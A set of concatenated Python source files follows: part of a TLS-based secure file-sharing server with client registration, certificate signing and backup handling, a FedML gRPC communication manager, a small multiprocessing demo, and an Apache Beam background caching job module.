print "[+][" + now() + "] Client with ip %s is connected and trusts me. I'm serving him in port %s, using %s." %(client_ip, serving_port, conn.version())
conn = server_send_ok(conn, client_ip)
# CONN-TRACK
conn_tracker[(client_ip, serving_port)] = [data]
return conn, True, conn_tracker
# ---------------------
# CLIENT NAME MESSAGE |
# ---------------------
elif "NAME: " in data:
client_name = data.replace("NAME: ","", 1)
try:
# CONN-TRACK
conn_tracker[(client_ip, serving_port)].append(client_name)
except KeyError:
print "[!][" + now() + "] Cutting off connection with ip %s in port %s. No hello message..." %(client_ip, serving_port)
conn = server_send_nok(conn, client_ip)
return conn, False, conn_tracker # bye client
if not client_name:
print "[!][" + now() + "] Cutting off connection with ip %s in port %s. No client name found..." %(client_ip, serving_port)
conn = server_send_nok(conn, client_ip)
return conn, False, conn_tracker # bye client
# if client name has invalid characters, supposedly worked on the client-side, then the client is either removing client-side checks or
# he was a victim of a man-in-the-middle attack (supposing our one-way TLS isn't secure enough, which is doubtful)
verified_client_name = verify_clientname(client_name)
if not verified_client_name:
print "[!][" + now() + "] Client name is being tampered with, cutting off connection with ip %s in port %s..." %(client_ip, serving_port)
conn = server_send_nok(conn, client_ip)
return conn, False, conn_tracker # bye client
print "[+][" + now() + "] Client with ip %s, served in port %s, says his name is %s." %(client_ip, serving_port, client_name)
# send client register status to client
conn, registered_status = server_get_send_regstatus(conn, client_name, send=True)
update_json_file(client_name, registered_status)
return conn, True, conn_tracker
# -----------------------------------------
# CLIENT REGISTER AND CERTIFICATE SIGNING |
# -----------------------------------------
elif data=="REGISTER":
client_name = get_clientname(client_ip, serving_port, conn_tracker)
if not client_name:
return conn, False, conn_tracker # bye client
print "[+][" + now() + "] Client %s wants to register." %(client_name)
# check registered status, if he is registered and we are here, then something fishy is going on
# because either client-side checks have been surpassed or client name was changed on the fly.
conn, registered = server_get_send_regstatus(conn, client_name, send=False)
if registered:
print "[!][" + now() + "] Client %s is already registered, cannot reregister, cutting off connection..." %(client_name)
conn = server_send_nok(conn)
return conn, False, conn_tracker # bye client
# confirm signing request is following previous rules
conn = server_send_ok(conn, client_name)
# handle unexpected data
try:
cert_sign_request_len = int(conn.read())
except ValueError:
print "[!][" + now() + "] Client %s tried to send me a string that does not correspond to an integer. Cutting off connection..." %(client_name)
return conn, False, conn_tracker # bye client
client_csr = conn.recv(cert_sign_request_len)
client_csr_path = server_global.client_certificates_dir + os.sep + client_name + ".csr"
client_certificate_path = server_global.client_certificates_dir + os.sep + client_name + ".crt"
crt_verified = server_sign_clientcert(client_csr_path, client_csr, client_name)
if not crt_verified:
return conn, False, conn_tracker # bye client
# send this client his certificate
server_send_clientcert(conn, client_certificate_path, client_name)
# create this client's directory
mkdir_p(server_global.individual_files_dir + os.sep + client_name)
# setting registered_status to True
update_json_file(client_name, True)
conn = server_send_ok(conn, client_name)
return conn, False, conn_tracker # bye client
# ----------------------------------------------------
# CLIENT AUTHENTICATION AND MUTUAL-TLS (TWO-WAY TLS) |
# ----------------------------------------------------
elif data=="AUTHENTICATE":
# from this moment on, the client shall have a certificate signed by the server, so we can
# build a new SSLContext and tell it that we want to check our peer's (client) certificate
# and its inherent CA validation, respectively through a challenge-response mechanism (to
# prove the certificate is really of that client) and verifying the certificate's signer
# against the given one by the client (the signer should be us, i.e., the certificate should
# be "server.crt")
# info: https://tools.ietf.org/html/rfc5929.html ('tls-unique' mode), read also about TLS renegotiation standards
client_name = get_clientname(client_ip, serving_port, conn_tracker)
if not client_name:
return conn, False, conn_tracker # bye client
print "[+][" + now() + "] Client who said his name is %s wants to login." %(client_name)
# the purpose of this ssl wrapper is to authenticate the client to the server
mutual_ssl_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1_2)
# client auth: need to verify the client's given certificate was signed by our signing CA,
# so load its path into the verifiable locations
mutual_ssl_context.load_verify_locations("cli-signing-ca/sirs-cli-signing-ca.crt")
# load necessary files to create a TLS connection (server certificate and private key)
mutual_ssl_context.load_cert_chain(certfile="server/sirs-server.crt", keyfile="server/sirs-server.key")
# we require a certificate from the client this time, signed by our server
mutual_ssl_context.verify_mode = ssl.CERT_REQUIRED
mutual_ssl_context.check_hostname = False
print "[+][" + now() + "][M-TLS] Verifying if %s's certificate was indeed signed by us, i.e., by our client certificate signing CA." %(client_name)
# instead of completely closing the connection now and starting a new one, simply rewrap the socket with our new SSL configuration
# this will raise an Error if anything's wrong with the received certificate
# try/except for the case of the client giving us a certificate that wasn't signed by us
try:
mutual_conn = mutual_ssl_context.wrap_socket(conn, server_side=True, do_handshake_on_connect=True)
except ssl.SSLError as err:
print "[!][" + now() + "] Client %s provided a certificate that wasn't signed by our certificate authority. Error: %s" %(client_name, repr(err))
conn = server_send_nok(conn, client_name)
return conn, False, conn_tracker # bye client
except socket.error:
print "[!][" + now() + "] Client %s tried to login without the correct private key." %(client_name)
return conn, False, conn_tracker # bye client
# issuer is verified already, so let's verify peer certificate subject to check if it matches our current client;
# this is used as a protection against client-side tampering where the client sends us another client's certificate (that cannot be accepted)
correct_subject_info = "Subject: C = PT, ST = Lisboa, L = Lisboa, O = " + client_name + ", CN = *." + client_name + ".org"
client_cert = mutual_conn.getpeercert()
client_cert_verified = verify_cert_subject(client_cert, correct_subject_info, client_name)
if not client_cert_verified:
# FUTURE-WORK: it would be nice if we could add this certificate to a revogation list, and also check it...
# (no time for implementing CRLs and CRLs check in this project, unfortunately)
print "[!][" + now() + "] Someone with a certificate signed by us is trying to start a session in the name of %s, but this certificate doesn't match the username. Certificate identity: '%s'" %(client_name,get_subject(client_cert))
conn = server_send_nok(mutual_conn, client_name)
return mutual_conn, False, conn_tracker # bye client
conn = server_send_ok(mutual_conn, client_name)
# CONN-TRACK
conn_tracker[(client_ip, serving_port)].append(data)
return mutual_conn, True, conn_tracker # authenticated session from now on
# -------------------------
# LIST SYNCHRONIZED FILES |
# -------------------------
elif data=="LIST-FILES":
client_name = get_clientname(client_ip, serving_port, conn_tracker)
if not client_name:
return conn, False, conn_tracker # bye client
client_loggedin_status = get_client_loggedin_status(client_ip, serving_port, client_name, conn_tracker)
if not client_loggedin_status:
return conn, False, conn_tracker # bye client
print "[+][" + now() + "] Client %s wants to know what files he has synchronized with us (individual and shared)." %(client_name)
serverside_individual_dirname = server_global.individual_files_dir + os.sep + client_name
clientside_individual_dirname = "myprivatefiles"
individualfile_structure = fs_server2client(serverside_individual_dirname, clientside_individual_dirname, file_content_flag=False)
conn = send_in_chunks(conn, individualfile_structure)
creator_sharees_list = []
for shared_directory in os.listdir(server_global.shared_files_dir):
if client_name in shared_directory.split("-"):
creator_sharees_list.append(shared_directory)
sharedfile_structure_list = []
for creator_sharees_repr in creator_sharees_list:
serverside_shared_dirname = server_global.shared_files_dir + os.sep + creator_sharees_repr
clientside_shared_dirname = "mysharedfiles" + os.sep + creator_sharees_repr
sharedfile_structure = fs_server2client(serverside_shared_dirname, clientside_shared_dirname, file_content_flag=False)
# remove other clients encrypted AES keys
for shared_directory in sharedfile_structure:
sharedfiles_list = sharedfile_structure[shared_directory].keys()
for sharedfile in sharedfiles_list:
if sharedfile.endswith(".key.encrypted." + client_name):
continue
elif sharedfile.endswith(".encrypted"):
continue
else:
sharedfile_structure[shared_directory].pop(sharedfile)
sharedfile_structure_list.append(sharedfile_structure)
conn = send_in_chunks(conn, sharedfile_structure_list)
return conn, True, conn_tracker # continue connection, this action can be performed in conjunction with others
# ----------------
# LIST ALL USERS |
# ----------------
elif data=="LIST-ALL-USERS":
client_name = get_clientname(client_ip, serving_port, conn_tracker)
if not client_name:
return conn, False, conn_tracker # bye client
client_loggedin_status = get_client_loggedin_status(client_ip, serving_port, client_name, conn_tracker)
if not client_loggedin_status:
return conn, False, conn_tracker # bye client
registered_client_names = []
for elem_name in server_global.clients_info:
registered_client = server_get_send_regstatus(conn, elem_name, send=False)[1]
if registered_client:
registered_client_names.append(elem_name)
conn = send_in_chunks(conn, registered_client_names)
return conn, True, conn_tracker
# -----------------------------------------
# SEND (FILE-FLOW: FROM CLIENT TO SERVER) |
# -----------------------------------------
elif data=="SEND":
client_name = get_clientname(client_ip, serving_port, conn_tracker)
if not client_name:
return conn, False, conn_tracker # bye client
client_loggedin_status = get_client_loggedin_status(client_ip, serving_port, client_name, conn_tracker)
if not client_loggedin_status:
return conn, False, conn_tracker # bye client
print "[+][" + now() + "] Client %s wants to send private files." %(client_name)
conn, individualfile_structure = read_in_chunks(conn, client_name)
if not individualfile_structure:
return conn, False, conn_tracker # bye client
# create individual files server-side
serverside_individual_dirname = server_global.individual_files_dir + os.sep + client_name
backup_individual_dirname = server_global.individual_backup_files_dir + os.sep + client_name + "@" + now()
clientside_individual_dirname = "myprivatefiles"
conn, sandbox_ok = construct_client_files(conn, client_name, serverside_individual_dirname, backup_individual_dirname, \
clientside_individual_dirname, False, individualfile_structure)
if not sandbox_ok:
return conn, False, conn_tracker # bye client
conn = server_send_ok(conn, client_name)
return conn, False, conn_tracker # bye client
# ------------------------------------------
# FETCH (FILE-FLOW: FROM SERVER TO CLIENT) |
# ------------------------------------------
elif data=="FETCH":
client_name = get_clientname(client_ip, serving_port, conn_tracker)
if not client_name:
return conn, False, conn_tracker # bye client
client_loggedin_status = get_client_loggedin_status(client_ip, serving_port, client_name, conn_tracker)
if not client_loggedin_status:
return conn, False, conn_tracker # bye client
print "[+][" + now() + "] Client %s wants to fetch a private file or directory." %(client_name)
serverside_individual_dirname = server_global.individual_files_dir + os.sep + client_name
clientside_individual_dirname = "myprivatefiles"
input_path = conn.read()
# handle unexpected data
try:
local_path = input_path.split(clientside_individual_dirname, 1)[1].lstrip(os.sep)
except IndexError:
print "[!][" + now() + "] Client %s sent an unexpected message. Cutting connection off..." %(client_name)
return conn, False, conn_tracker
clientside_path = clientside_individual_dirname + os.sep + local_path
serverside_path = serverside_individual_dirname + os.sep + local_path
individualfile_structure, good_output = fetch_files_dirs(serverside_path, clientside_path, client_name)
if not good_output:
return conn, False, conn_tracker # bye client
conn = send_in_chunks(conn, individualfile_structure)
conn = server_send_ok(conn, client_name)
return conn, False, conn_tracker # bye client
# ----------------------------------------------
# SHARE (FILE-FLOW: FROM CLIENT TO SERVER) |
# ----------------------------------------------
elif data=="SHARE":
client_name = get_clientname(client_ip, serving_port, conn_tracker)
if not client_name:
return conn, False, conn_tracker # bye client
client_loggedin_status = get_client_loggedin_status(client_ip, serving_port, client_name, conn_tracker)
if not client_loggedin_status:
return conn, False, conn_tracker # bye client
conn, share_info = read_in_chunks(conn, client_name)
if not share_info:
return conn, False, conn_tracker # bye client
share_path = share_info[0]
share_users = [client_name] + share_info[1]
user_certs = dict()
creator_sharees_repr = ""
for username in share_users:
user_cert = get_user_cert_content(username)
user_certs[username] = user_cert
creator_sharees_repr += username + "-"
creator_sharees_repr = creator_sharees_repr.rstrip("-")
conn = send_in_chunks(conn, user_certs)
conn, sharedfile_structure = read_in_chunks(conn, client_name)
if not sharedfile_structure:
return conn, False, conn_tracker # bye client
# create shared files server-side
serverside_shared_dirname = server_global.shared_files_dir + os.sep + creator_sharees_repr
backup_shared_dirname = server_global.shared_backup_files_dir + os.sep + creator_sharees_repr + "@" + now()
clientside_shared_dirname = "mysharedfiles" + os.sep + creator_sharees_repr
conn, sandbox_ok = construct_client_files(conn, client_name, serverside_shared_dirname, backup_shared_dirname, \
clientside_shared_dirname, True, sharedfile_structure)
if not sandbox_ok:
return conn, False, conn_tracker # bye client
conn = server_send_ok(conn, client_name)
return conn, False, conn_tracker # bye client
# -----------------------------------------------------
# FETCH-SHARED (FILE-FLOW: FROM CLIENT TO SERVER) |
# -----------------------------------------------------
elif data=="FETCH-SHARED":
client_name = get_clientname(client_ip, serving_port, conn_tracker)
if not client_name:
return conn, False, conn_tracker # bye client
client_loggedin_status = get_client_loggedin_status(client_ip, serving_port, client_name, conn_tracker)
if not client_loggedin_status:
return conn, False, conn_tracker # bye client
print "[+][" + now() + "] Client %s wants to fetch a shared file or directory." %(client_name)
input_path = conn.read()
try:
local_path = input_path.split("mysharedfiles", 1)[1].lstrip(os.sep)
except IndexError:
print "[!][" + now() + "] Client %s sent an unexpected message. Cutting connection off..." %(client_name)
return conn, False, conn_tracker # bye client
creator_sharees_repr = ""
for shared_directory in os.listdir(server_global.shared_files_dir):
input_creator_sharees_repr = local_path.split(os.sep, 1)[0]
if client_name in shared_directory.split("-") and shared_directory==input_creator_sharees_repr:
creator_sharees_repr = shared_directory
break
if not creator_sharees_repr:
print "[!][" + now() + "] Client %s didn't send a correct share-directory. Cutting connection off..." %(client_name)
return conn, False, conn_tracker # bye client
serverside_shared_dirname = server_global.shared_files_dir + os.sep + creator_sharees_repr
clientside_shared_dirname = "mysharedfiles" + os.sep + creator_sharees_repr
# handle unexpected data
try:
local_path = input_path.split(clientside_shared_dirname, 1)[1].lstrip(os.sep)
except IndexError:
print "[!][" + now() + "] Client %s sent an unexpected message. Cutting connection off..." %(client_name)
return conn, False, conn_tracker # bye client
clientside_path = (clientside_shared_dirname + os.sep + local_path).rstrip(os.sep)
serverside_path = (serverside_shared_dirname + os.sep + local_path).rstrip(os.sep)
sharedfile_structure, good_output = fetch_files_dirs(serverside_path, clientside_path, client_name, sharedfile_username=client_name)
if not good_output:
return conn, False, conn_tracker # bye client
conn = send_in_chunks(conn, sharedfile_structure)
conn = server_send_ok(conn, client_name)
return conn, False, conn_tracker # bye client
# -------------------------------------------------------
# SEND-SHARED (FILE-FLOW: FROM CLIENT TO SERVER) |
# -------------------------------------------------------
elif data=="SEND-SHARED":
client_name = get_clientname(client_ip, serving_port, conn_tracker)
if not client_name:
return conn, False, conn_tracker # bye client
client_loggedin_status = get_client_loggedin_status(client_ip, serving_port, client_name, conn_tracker)
if not client_loggedin_status:
return conn, False, conn_tracker # bye client
print "[+][" + now() + "] Client %s wants to send a shared file or directory." %(client_name)
conn, share_info = read_in_chunks(conn, client_name)
if not share_info:
return conn, False, conn_tracker # bye client
share_path = share_info[0]
share_users = [client_name] + share_info[1]
user_certs = dict()
creator_sharees_repr = ""
for username in share_users:
user_cert = get_user_cert_content(username)
user_certs[username] = user_cert
creator_sharees_repr += username + "-"
creator_sharees_repr = creator_sharees_repr.rstrip("-")
conn = send_in_chunks(conn, user_certs)
conn, sharedfile_structure = read_in_chunks(conn, client_name)
if not sharedfile_structure:
return conn, False, conn_tracker # bye client
# example filepath
input_creator_sharees_repr = sharedfile_structure.keys()[0].split(os.sep)[1]
creator_sharees_repr = ""
for shared_directory in os.listdir(server_global.shared_files_dir):
if client_name in shared_directory.split("-") and shared_directory==input_creator_sharees_repr:
creator_sharees_repr = shared_directory
break
if not creator_sharees_repr:
print "[!][" + now() + "] Client %s didn't send a correct share-directory. Cutting connection off..." %(client_name)
return conn, False, conn_tracker # bye client
# create individual files server-side
serverside_shared_dirname = server_global.shared_files_dir + os.sep + creator_sharees_repr
backup_shared_dirname = server_global.shared_backup_files_dir + os.sep + creator_sharees_repr + "@" + now()
clientside_shared_dirname = "mysharedfiles" + os.sep + creator_sharees_repr
conn, sandbox_ok = construct_client_files(conn, client_name, serverside_shared_dirname, backup_shared_dirname, \
clientside_shared_dirname, True, sharedfile_structure)
if not sandbox_ok:
return conn, False, conn_tracker # bye client
conn = server_send_ok(conn, client_name)
return conn, False, conn_tracker # bye client
# --------------------------------------------------
# LIST CLIENT'S INDIVIDUAL AND SHARED BACKUP FILES |
# --------------------------------------------------
elif data=="LIST-MY-BACKUPS":
client_name = get_clientname(client_ip, serving_port, conn_tracker)
if not client_name:
return conn, False, conn_tracker # bye client
client_loggedin_status = get_client_loggedin_status(client_ip, serving_port, client_name, conn_tracker)
if not client_loggedin_status:
return conn, False, conn_tracker # bye client
print "[+][" + now() + "] Client %s wants to know every directory we have backed up so far." %(client_name)
individual_backup_dirs = get_individual_backup_dirs(client_name)
shared_backup_dirs = get_shared_backup_dirs(client_name)
conn = send_in_chunks(conn, individual_backup_dirs)
conn = send_in_chunks(conn, shared_backup_dirs)
return conn, True, conn_tracker # continue connection, this action can be performed in conjunction with others
# -------------------------------------------
# REVERT (FILE-FLOW: FROM SERVER TO CLIENT) |
# -------------------------------------------
elif data=="REVERT":
client_name = get_clientname(client_ip, serving_port, conn_tracker)
if not client_name:
return conn, False, conn_tracker # bye client
client_loggedin_status = get_client_loggedin_status(client_ip, serving_port, client_name, conn_tracker)
if not client_loggedin_status:
return conn, False, conn_tracker # bye client
print "[+][" + now() + "] Client %s wants to revert his local files to another point in time." %(client_name)
conn, chosen_backup_directory = read_in_chunks(conn, client_name)
serverside_individual_dirname = server_global.individual_backup_files_dir + os.sep + client_name + "@"
all_backup_dirs = sorted(os.listdir(server_global.individual_backup_files_dir))
client_backup_dirs = []
for client_backup in reversed(all_backup_dirs):
server_backup_file = server_global.individual_backup_files_dir + os.sep + client_backup
if serverside_individual_dirname in server_backup_file:
client_backup_dirs.append(client_backup)
restore_list = []
checkpoint_found_flag = False
for client_backup_directory in client_backup_dirs:
print client_backup_directory
print (client_name + "@" + chosen_backup_directory)
restore_list.append(client_backup_directory)
if (client_name + "@" + chosen_backup_directory)==client_backup_directory:
checkpoint_found_flag = True
break
if not checkpoint_found_flag:
print "[!][" + now() + "] The checkpoint client %s sent us isn't available. This shouldn't be possible if the client doesn't tamper with the client application" %(client_name)
return conn, False, conn_tracker # bye client
clientside_individual_dirname = "myprivatefiles"
serverside_individual_dirname = server_global.individual_files_dir + os.sep + client_name
file_structure_list = []
for client_backup_directory in restore_list:
backup_individual_dirname = server_global.individual_backup_files_dir + os.sep + client_backup_directory
file_structure = fs_server2client(backup_individual_dirname, clientside_individual_dirname)
file_structure_list.append(file_structure)
conn = send_in_chunks(conn, file_structure_list)
conn = server_send_ok(conn, client_name)
return conn, False, conn_tracker # bye client
# --------------------------------------------------
# REVERT-SHARED (FILE-FLOW: FROM SERVER TO CLIENT) |
# --------------------------------------------------
elif data=="REVERT-SHARED":
client_name = get_clientname(client_ip, serving_port, conn_tracker)
if not client_name:
return conn, False, conn_tracker # bye client
client_loggedin_status = get_client_loggedin_status(client_ip, serving_port, client_name, conn_tracker)
if not client_loggedin_status:
return conn, False, conn_tracker # bye client
print "[+][" + now() + "] Client %s wants to revert his local files to another point in time." %(client_name)
conn, chosen_backup_directory = read_in_chunks(conn, client_name)
client_names_list = chosen_backup_directory.split("@",1)[0].split("-")
client_names_repr = "-".join(client_names_list)
shared_backup_dirs = reversed(sorted(get_shared_backup_dirs(client_name)))
restore_list = []
checkpoint_found_flag = False
for shared_backup_directory in shared_backup_dirs:
restore_list.append(shared_backup_directory)
if chosen_backup_directory==shared_backup_directory:
checkpoint_found_flag = True
break
if not checkpoint_found_flag:
print "[!][" + now() + "] The checkpoint client %s sent us isn't available. This shouldn't be possible if the client doesn't tamper with the client application" %(client_name)
return conn, False, conn_tracker # bye client
clientside_shared_dirname = "mysharedfiles" + os.sep + client_names_repr
file_structure_list = []
for shared_backup_directory in restore_list:
backup_shared_dirname = server_global.shared_backup_files_dir + os.sep + shared_backup_directory
file_structure = fs_server2client(backup_shared_dirname, clientside_shared_dirname, sharedfile_username=client_name)
file_structure_list.append(file_structure)
conn = send_in_chunks(conn, file_structure_list)
conn = server_send_ok(conn, client_name)
return conn, False, conn_tracker # bye client
# --------------------------------------------------------
# DELETE-FILE (appliable to individual files and backups |
# --------------------------------------------------------
elif data=="DELETE-FILE":
client_name = get_clientname(client_ip, serving_port, conn_tracker)
if not client_name:
return conn, False, conn_tracker # bye client
client_loggedin_status = get_client_loggedin_status(client_ip, serving_port, client_name, conn_tracker)
if not client_loggedin_status:
return conn, False, conn_tracker # bye client
print "[+][" + now() + "] Client %s wants to delete a local file or dir in here (individual files)." %(client_name)
clientside_path = conn.read()
clientside_individual_dirname = "myprivatefiles"
serverside_individual_dirname = server_global.individual_files_dir + os.sep + client_name
serverside_path = clientside_path.replace(clientside_individual_dirname,serverside_individual_dirname, 1) # replace only first occurence
if sandbox_escaped(serverside_path, serverside_individual_dirname, conn, client_name):
return conn, False, conn_tracker # bye client
if os.path.isdir(serverside_path):
empty_directory(serverside_path)
elif os.path.isfile(serverside_path + ".encrypted"):
delete_file_or_dir(serverside_path + ".encrypted")
delete_file_or_dir(serverside_path + ".key.encrypted")
delete_file_or_dir(serverside_path + ".sig")
conn = server_send_ok(conn, client_name)
return conn, False, conn_tracker # bye client
def threaded_clienthandler(client_ip, serving_port, serving_socket, initial_ssl_context):
new_conn = initial_ssl_context.wrap_socket(serving_socket, server_side=True, do_handshake_on_connect=True)
server_global.open_sockets.append(new_conn)
try:
deal_with_client(new_conn, client_ip, serving_port)
# clean up: close connection socket if open and leave
except KeyboardInterrupt:
if new_conn in server_global.open_sockets: server_close_connection_socket(new_conn, serving_port)
print "[!][" + now() + "] CTRL-C: Server shutting down..."
exit()
except ssl.SSLError as err:
print "[!][" + now() + "] Client sent a message that could not be decrypted. Closing connection. Error code: %s" %(repr(err))
# normal behavior: close connection socket
if new_conn in server_global.open_sockets: server_close_connection_socket(new_conn, serving_port)
server_global.thread_semaphore.release()
def wait_for_clients(main_server_socket, initial_ssl_context):
# ensuring robustness in server shutdowns
try:
serving_socket, serving_info = main_server_socket.accept()
client_ip = serving_info[0]
serving_port = serving_info[1]
server_global.thread_semaphore.acquire()
# clean up: close all current connections and leave
except KeyboardInterrupt:
for open_client_conn in server_global.open_sockets:
server_close_connection_socket(open_client_conn, serving_port)
print "[!][" + now() + "] CTRL-C: Server shutting down..."
exit()
# REMEMBERME: switch to multi threading
#threaded_clienthandler(client_ip, serving_port, serving_socket, initial_ssl_context) # debugging without multi-threading
# deal with new connection by creating a new thread
handler_thread = threading.Thread(target=threaded_clienthandler, args=(client_ip, serving_port, serving_socket, initial_ssl_context))
handler_thread.start()
def server():
simple_banner = "###################### SIRS-SERVER ######################"
print simple_banner
HOST = ""
PORT = 1337
# TLS VERSION USED: TLSv1.2
# the purpose of this ssl context is to initiate a connection with the client.
# we will not be able to fully authenticate the client just yet
initial_ssl_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1_2)
# load necessary files to create a TLS connection (server certificate and private key)
initial_ssl_context.load_cert_chain(certfile="server/sirs-server.crt", keyfile="server/sirs-server.key")
# we have a fake domain name in the client certificate, but we can't verify it yet because we don't know
# the client's defined hostname yet, neither do we have the client's certificate yet. We need to uncheck
# this option and create a One-way TLS connection for now
initial_ssl_context.check_hostname = False
# we do not require a certificate from the client just yet
initial_ssl_context.verify_mode = ssl.CERT_NONE
main_server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# SO_REUSEADDR is used so the server socket can be reused if needed (for example, if we CTRL-C)
main_server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
main_server_socket.bind((HOST, PORT))
main_server_socket.listen(5) # 5 clients allowed in queue for this socket
# wait for clients to connect to our server
while True:
wait_for_clients(main_server_socket, initial_ssl_context)
def run():
mkdir_p(server_global.client_certificates_dir)
mkdir_p(server_global.individual_files_dir)
mkdir_p(server_global.shared_files_dir)
mkdir_p(server_global.individual_backup_files_dir)
mkdir_p(server_global.shared_backup_files_dir)
# create clients file if it doesn't exist yet
if not os.path.exists(server_global.client_json_filename):
open(server_global.client_json_filename, "a").close()
# populate 'clients' dict from the file (mini dbase)
try:
json_f = open(server_global.client_json_filename, "r")
server_global.clients_info = json.loads(json_f.read())
except ValueError:
server_global.clients_info = dict()
json_f.close()
# DANGEROUS VARIABLES FOR MULTI-THREADING: "clients_info", "open_sockets".
# FILE OPERATIONS ARE DANGEROUS IN MULTI-THREADING: CONTROL READ-WRITE OPERATIONS
server()
class ServerGlobal:
def __init__(self):
self.clients_dir = "clients"
self.client_certificates_dir = self.clients_dir + os.sep + "client_certs"
self.individual_files_dir = self.clients_dir + os.sep + "individual_files"
self.shared_files_dir = self.clients_dir + os.sep + "shared_files"
self.individual_backup_files_dir = self.clients_dir + os.sep + "individual_backups"
self.shared_backup_files_dir = self.clients_dir + os.sep + "shared_backups"
self.client_json_filename = self.clients_dir + os.sep + "clients_info.json"
self.open_sockets = []
self.clients_info = {}
# BOUNDED-SEMAPHORE: limit simultaneous client threads to "MAX_THREADS" (default value: 4)
self.thread_semaphore = threading.BoundedSemaphore(value=4)
server_global = ServerGlobal()
if __name__=="__main__":
run() |
grpc_comm_manager.py | import logging
from typing import List
from concurrent import futures
import threading
import grpc
from ..gRPC import grpc_comm_manager_pb2_grpc, grpc_comm_manager_pb2
lock = threading.Lock()
from FedML.fedml_core.distributed.communication.base_com_manager import BaseCommunicationManager
from FedML.fedml_core.distributed.communication.message import Message
from FedML.fedml_core.distributed.communication.observer import Observer
from FedML.fedml_core.distributed.communication.gRPC.grpc_server import GRPCCOMMServicer
class GRPCCommManager(BaseCommunicationManager):
def __init__(self, host, port, topic='fedml', client_id=0, client_num=0):
self.host = host
self.port = str(port)
self._topic = topic
self.client_id = client_id
self.client_num = client_num
self._observers: List[Observer] = []
if client_id == 0:
self.node_type = "server"
else:
self.node_type = "client"
self.grpc_server = grpc.server(futures.ThreadPoolExecutor(max_workers=client_num))
self.grpc_servicer = GRPCCOMMServicer(host, port, client_num, client_id)
grpc_comm_manager_pb2_grpc.add_gRPCCommManagerServicer_to_server(
self.grpc_servicer,
self.grpc_server
)
self.grpc_server.add_insecure_port("{}:{}".format(host, port))
self.grpc_server.start()
print("server started. Listening on port " + str(port))
def send_message(self, msg: Message):
payload = msg.to_json()
receiver_id = msg.get_receiver_id()
if receiver_id == 0:
channel_url = '{}:{}'.format('67.199.133.186', str(50000 + receiver_id))
elif receiver_id == 1:
channel_url = '{}:{}'.format('67.199.133.186', str(50000 + receiver_id))
elif receiver_id == 2:
channel_url = '{}:{}'.format('117.161.90.229', str(50000 + receiver_id))
channel = grpc.insecure_channel(channel_url)
stub = grpc_comm_manager_pb2_grpc.gRPCCommManagerStub(channel)
request = grpc_comm_manager_pb2.CommRequest()
logging.info("sending message to port " + str(50000 + int(msg.get_receiver_id())))
request.client_id = self.client_id
request.message = payload
stub.sendMessage(request)
logging.info("sent")
def add_observer(self, observer: Observer):
self._observers.append(observer)
def remove_observer(self, observer: Observer):
self._observers.remove(observer)
def handle_receive_message(self):
thread = threading.Thread(target=self.message_handling_subroutine)
thread.start()
def message_handling_subroutine(self):
while True:
if self.grpc_servicer.message_q.qsize() > 0:
lock.acquire()
msg_params_string = self.grpc_servicer.message_q.get()
msg_params = Message()
msg_params.init_from_json_string(msg_params_string)
msg_type = msg_params.get_type()
for observer in self._observers:
observer.receive_message(msg_type, msg_params)
lock.release()
def stop_receive_message(self):
pass
def notify(self, message: Message):
msg_type = message.get_type()
for observer in self._observers:
observer.receive_message(msg_type, message)
|
process_id.py | #!/usr/bin/python
from multiprocessing import Process
import os
# getting parent and child process Ids
def fun():
print('--------------------------')
print('calling fun')
print('parent process id:', os.getppid())
print('process id:', os.getpid())
def main():
print('main fun')
print('process id:', os.getpid())
p1 = Process(target=fun)
p1.start()
p1.join()
p2 = Process(target=fun)
p2.start()
p2.join()
if __name__ == '__main__':
main()
|
background_caching_job.py | #
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Module to build and run background caching job.
For internal use only; no backwards-compatibility guarantees.
A background caching job is a job that captures events for all capturable
sources of a given pipeline. With Interactive Beam, one such job is started when
a pipeline run happens (which produces a main job in contrast to the background
caching job) and meets the following conditions:
#. The pipeline contains capturable sources, configured through
interactive_beam.options.capturable_sources.
#. No such background job is running.
#. No such background job has completed successfully and the cached events are
still valid (invalidated when capturable sources change in the pipeline).
Once started, the background caching job runs asynchronously until it hits some
capture limit configured in interactive_beam.options. Meanwhile, the main job
and future main jobs from the pipeline will run using the deterministic
replayable captured events until they are invalidated.
"""
# pytype: skip-file
from __future__ import absolute_import
import logging
import threading
import time
import apache_beam as beam
from apache_beam.runners.interactive import interactive_environment as ie
from apache_beam.runners.interactive.caching import streaming_cache
from apache_beam.runners.runner import PipelineState
_LOGGER = logging.getLogger(__name__)
class BackgroundCachingJob(object):
"""A simple abstraction that controls necessary components of a timed and
space limited background caching job.
A background caching job successfully completes source data capture in 2
conditions:
#. The job is finite and runs into DONE state;
#. The job is infinite but hits an interactive_beam.options configured limit
and gets cancelled into CANCELLED/CANCELLING state.
In both situations, the background caching job should be treated as done
successfully.
"""
def __init__(self, pipeline_result, limiters):
self._pipeline_result = pipeline_result
self._condition_checker = threading.Thread(
target=self._background_caching_job_condition_checker, daemon=True)
# Limiters are checks s.t. if any are triggered then the background caching
# job gets cancelled.
self._limiters = limiters
self._condition_checker.start()
def _background_caching_job_condition_checker(self):
while not PipelineState.is_terminal(self._pipeline_result.state):
if self._should_end_condition_checker():
self.cancel()
break
time.sleep(0.5)
def _should_end_condition_checker(self):
return any([l.is_triggered() for l in self._limiters])
def is_done(self):
is_terminated = self._pipeline_result.state is PipelineState.DONE
is_triggered = self._should_end_condition_checker()
is_cancelling = (
self._pipeline_result.state in (
PipelineState.CANCELLED, PipelineState.CANCELLING))
return is_terminated or (is_triggered and is_cancelling)
def is_running(self):
return self._pipeline_result.state is PipelineState.RUNNING
def cancel(self):
"""Cancels this background caching job.
"""
if not PipelineState.is_terminal(self._pipeline_result.state):
try:
self._pipeline_result.cancel()
except NotImplementedError:
# Ignore the cancel invocation if it is never implemented by the runner.
pass
